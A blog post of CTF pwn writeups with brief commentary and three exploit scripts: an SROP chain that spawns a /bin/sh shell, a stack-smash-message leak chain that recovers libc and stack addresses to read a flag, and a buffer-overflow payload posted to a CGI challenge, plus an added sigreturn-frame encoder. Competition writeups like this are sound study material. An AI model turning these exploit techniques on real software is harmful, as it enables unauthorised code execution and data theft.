This post was last updated: December 8, 2023, afternoon
0x0: Written before everything else
Don't ask. If you must know, I forgot to get the graduate school's liaison teacher to sign off, so my registration never went through. Dammit. Just thinking that making the finals would have meant a trip back to Zhejiang makes me itch all over.
🤡🤡🤡🤡🤡🤡🤡🤡🤡🤡🤡
0x1: pwn writeups
master of asm
Who dares call themselves "master of asm"? Do you even know how little you weigh?
It's just a simple SROP.
```python
from pwn import *
import sys
context.log_level='debug'
context.arch='amd64'

flag = 0
if flag:
    p = remote('182.92.164.148', 48649)
else:
    p = process("./a.out")
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))

# gadget addresses in the binary
xor_0 = 0x40103d
rax_2 = 0x401030
xor_1 = 0x401034
syscall = 0x40102d
bin_sh = 0x40200a   # address of the "/bin/sh" string

# sigreturn frame: after rt_sigreturn the registers are loaded for execve("/bin/sh", 0, 0)
exec_fun = SigreturnFrame()
exec_fun.rax = 0x3b
exec_fun.rdi = bin_sh
exec_fun.rsi = 0
exec_fun.rdx = 0
exec_fun.rip = syscall
# rax-massaging gadgets set rax for rt_sigreturn, then syscall consumes the frame
shellcode = p64(xor_0)\
    + p64(xor_1)\
    + p64(rax_2)\
    + p64(xor_1)\
    + p64(rax_2)\
    + p64(xor_1)\
    + p64(rax_2)\
    + p64(xor_1)\
    + p64(syscall)\
    + bytes(exec_fun)

p.send(shellcode.ljust(0x190,b'\x00'))
p.interactive()
```
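The SigreturnFrame above hides the actual layout of the amd64 rt_sigframe that rt_sigreturn restores. As an added example (not part of the original writeup, and not pwntools code), here is a small encoder/decoder for that layout that lets you inspect which syscall a frame in a captured payload would execute; the gadget and string addresses reused below are the ones from the exploit above.

```python
import struct

# Field order of the amd64 rt_sigframe (uc_flags .. sigmask), 8 bytes each.
# Offsets match what pwntools' SigreturnFrame() emits for context.arch='amd64'.
SIGFRAME_FIELDS = [
    "uc_flags", "&uc", "uc_stack.ss_sp", "uc_stack.ss_flags", "uc_stack.ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2", "&fpstate",
    "__reserved", "sigmask",
]
SIGFRAME_SIZE = 8 * len(SIGFRAME_FIELDS)   # 0xf8 bytes
FMT = "<" + "Q" * len(SIGFRAME_FIELDS)

SYSCALL_NAMES = {0x0: "read", 0x1: "write", 0xf: "rt_sigreturn", 0x3b: "execve", 0x3c: "exit"}

def build_frame(**regs):
    """Encode a frame; unset fields are 0 except csgsfs (0x33 = user-mode CS)."""
    values = {name: 0 for name in SIGFRAME_FIELDS}
    values["csgsfs"] = 0x33
    for name, val in regs.items():
        if name not in values:
            raise KeyError(f"unknown sigframe field {name}")
        values[name] = val
    return struct.pack(FMT, *(values[n] for n in SIGFRAME_FIELDS))

def decode_frame(blob, offset=0):
    """Decode the SIGFRAME_SIZE bytes at `offset` of a payload into {field: value}."""
    chunk = blob[offset:offset + SIGFRAME_SIZE]
    if len(chunk) != SIGFRAME_SIZE:
        raise ValueError("frame truncated")
    return dict(zip(SIGFRAME_FIELDS, struct.unpack(FMT, chunk)))

def describe_frame(frame):
    """Summarise the syscall that `syscall` at frame['rip'] would make after sigreturn."""
    name = SYSCALL_NAMES.get(frame["rax"], f"syscall {frame['rax']:#x}")
    return f"{name}(rdi={frame['rdi']:#x}, rsi={frame['rsi']:#x}, rdx={frame['rdx']:#x}) at rip={frame['rip']:#x}"

# Constructed sample: the same register set as the exploit above.
SYSCALL_GADGET = 0x40102d
BIN_SH = 0x40200a
sample = build_frame(rax=0x3b, rdi=BIN_SH, rsi=0, rdx=0, rip=SYSCALL_GADGET)

if __name__ == "__main__":
    print(describe_frame(decode_frame(sample)))
```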
ez_ssp
I was being dumb back then: I knew it was a stack smash, but for some reason I kept thinking I had to leak the flag in a single overflow, and spent ages brute-forcing the stack address without success.
It turned out all you need is to leak a GOT address, then use libc to pull the stack address out of _environ. Damn.
```python
from pwn import *
import sys
context.log_level='debug'
context.arch='amd64'
libc = ELF('./libc-2.23.so')
flag = 0
if flag:
    p = remote('182.92.164.148', 48649)
else:
    p = process("./ssp")
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
# gdb.attach(p,'b __stack_chk_fail\nc\n')

randon = []

# round 1: overwrite the pointer printed by the stack-smash message with puts@got -> libc base
sla(b'?\n',b'a')
ru(b': ')
randon.append(int(rc(2),10))
sla(b'?\n',b'a'*0x128 + p64(0x602018))
ru(b'***: ')
libc.address = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['puts']
leak("libc.address",libc.address)

# round 2: same trick with _environ -> stack address
sla(b'?\n',b'a')
ru(b': ')
randon.append(int(rc(2),10))
sla(b'?\n',b'a'*0x128 + p64(libc.sym['_environ']))
ru(b'***: ')
stack = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
leak("stack",stack)

# round 3: point at the flag buffer on the stack
flag_addr = stack - 0x178
sla(b'?\n',b'a')
ru(b': ')
randon.append(int(rc(2),10))
sla(b'?\n',b'b'*0x128 + p64(flag_addr))
ru(b': ')
flag = rc(50)

print(randon)
flag_list = list(flag)  # convert the bytes to a list so it can be modified
print(flag_list)

# undo the per-round XOR masking in reverse order
for i in range(len(randon)):
    for j in range(len(flag_list)):
        flag_list[j] = flag_list[j] ^ randon[2-i]

flag_txt = ''
for i in range(len(flag_list)):
    flag_txt = flag_txt + chr(flag_list[i])
print(flag_txt)
p.interactive()
```
APACHE-CGI-PWN
I kept assuming this was some badass web pwn, then Brother Hao solved it on the spot, and only then did I realize it was a pushover.
Speaking of which, why are CGI pwn challenges dressed in a web skin so popular lately? Longjian had one too.
I'm just lifting Brother Hao's exploit here, hehe.
```python
from pwn import *
import requests
context(log_level='debug')

headers = {
    'Cookie': "ROOT-GOD=Every king's blood will end with a sword",
    'CONTENT_LENGTH':'99999'
}

# padding must be bytes so it concatenates with p64() output under Python 3
payload=b'a'*(0xe8)+p64(0x4032fc)+p64(0x4032E0)
cookie = requests.post('http://ip:port/getcookie.cgi',data="eeknight",headers=headers)
check = requests.post('http://ip:port/check-ok.cgi', data = payload,headers=headers)

p = requests.get('http://ip:port/flag')
print(cookie.text)
print(check.text)
print(p.text)
```
0x3: The very end
What is there to say? That's it.